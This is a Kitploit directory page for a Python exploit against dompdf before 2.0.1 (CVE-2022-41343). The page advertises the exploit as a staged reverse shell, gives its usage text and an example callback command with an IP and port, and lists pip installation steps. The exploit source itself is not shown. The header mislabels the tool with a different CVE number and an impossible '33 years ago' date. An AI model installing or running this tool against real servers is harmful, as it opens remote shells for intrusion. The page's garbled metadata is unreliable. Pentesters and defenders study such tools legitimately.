Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-41343 — 🐍 Python Exploit for CVE-2022-23935 | Kitploit
Tools/GitHubGitHub/bkreisel/cve-2022-41343
Payload GenerationVulnerability AnalysisExploitationShellcodeWeb Application ExploitationPenetration Testing
GitHubbkreisel/cve-2022-41343

CVE-2022-41343

🐍 Python Exploit for CVE-2022-23935

View Repository
33 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-41343

🐍 Python Exploit for CVE-2022-41343

Staged Reverse Shell for dompdf < 2.0.1

Based on: Positive Sec's write-up and PoC

Example

root@kitploit:~
cve-2022-41343 10.10.16.3 44444

Usage

root@kitploit:~
usage: cve-2022-41343 [-h] [-l SERVER_PORT] [-s SHELL] [-n FONT_NAME] ip port

positional arguments:
  ip                    Shell Callback IP Address/Host
  port                  Shell Callback Port

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Server Listening Port (default: 55555)
  -s SHELL, --shell SHELL
                        Remote Shell (default: bash)
  -n FONT_NAME, --font-name FONT_NAME
                        Exploit Font Name (default: comicsploitz)

PyPi Installation

root@kitploit:~
python3 -m pip install cve-2022-41343

Manual Installation

root@kitploit:~
python3 -m pip install cve-2022-41343-1.0.0-py3-none-any.whl

Download Latest Release

Demo

demo

Download Tool